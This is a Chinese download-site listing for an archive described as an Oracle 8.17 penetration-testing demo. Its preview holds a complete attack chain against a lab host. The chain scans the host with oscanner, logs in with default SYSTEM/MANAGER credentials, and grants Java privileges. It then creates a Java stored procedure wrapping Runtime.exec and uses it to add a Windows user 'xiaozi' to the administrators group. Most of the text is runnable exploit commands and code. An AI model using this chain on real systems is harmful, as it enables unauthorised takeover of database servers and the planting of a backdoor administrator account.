oracle8.17渗透里面包含，oracle8.17渗透演示的步骤和命令，还有java.sql数据库语句，配套我近期写的文章

共2个文件

txt：1个

sql：1个

oracle

渗透测试

需积分: 5 0 下载量 43 浏览量 2022-12-21 15:49:29 上传评论收藏 1KB RAR 举报

温馨提示

对oracle8.17数据库的渗透测试，先进行扫描，获得DBA账户之后，进行sql语句执行cmd命令，从而完成对整个系统的渗透

资源推荐

资源详情

资源评论

收起资源包目录

oracle8.17渗透.rar （2个子文件）

oracle数据渗透演示.txt 949B

java.sql 405B

共 2 条

一、oracle数据库扫描软件（oscanner） 1.安装oscanner（linux） apt-get install oscanner 2.运行oscanner oscanner -s 192.168.56.9 -P 1521 二、使用sqlplus进行远程连接oracle数据库 sqlplus.exe SYSTEM/MANAGER@192.168.56.9:1521/ora8 三、渗透测试（DBA权限） 1.首先开启java的权限 grant javasyspriv to SYSTEM; 2.新建Java.sql,内容为： CREATE OR REPLACE AND RESOLVE Java SOURCE NAMED "JAVACMD" AS import java.lang.*; import java.io.*; public class JAVACMD { public static void execCommand (String command) throws IOException { Runtime.getRuntime().exec(command); } }; / CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME 'JAVACMD.execCommand (java.lang.String)'; / 3.执行cmd的命令 exec javacmdproc('cmd.exe /c net user xiaozi 123 /add'); exec javacmdproc('cmd.exe /c net localgroup administrators xiaozi /add'); 等等

评论收藏

内容反馈

资源评论